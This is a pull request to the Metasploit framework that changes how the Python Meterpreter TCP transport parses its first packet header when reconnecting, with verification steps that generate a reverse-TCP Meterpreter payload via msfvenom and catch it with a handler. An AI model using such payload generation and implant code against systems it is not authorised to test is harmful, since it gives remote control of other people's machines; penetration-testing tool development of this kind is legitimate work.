### PR TITLE
Fixed reconnecting of staged python tcp meterpreter

### DIFF
--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -657,10 +657,9 @@ class TcpTransport(Transport):
 			self.request_retire = True
 			return None
 		if len(packet) != 12:
-			if first and len(packet) == 8:
+			if first and len(packet) == 4:
 				received = 0
-				xor_key = packet[:4][::-1]
-				header = xor_bytes(xor_key, packet[4:8])
+				header = packet[:4]
 				pkt_length = struct.unpack('>I', header)[0]
 				self.socket.settimeout(max(self.communication_timeout, 30))
 				while received < pkt_length:


### PR DESCRIPTION
This PR fixes rapid7/metasploit-framework#6842

Verification
======
* [x] Generate payload file: ```msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 > payload.py```
* [x] Set up exploit/multi/handler
* [x] Execute the payload
* [x] The payload should connect successfully
* [x] Exit the metasploit console, restart and set up exploit/multi/handler again
* [ ] The payload should now reconnect correctly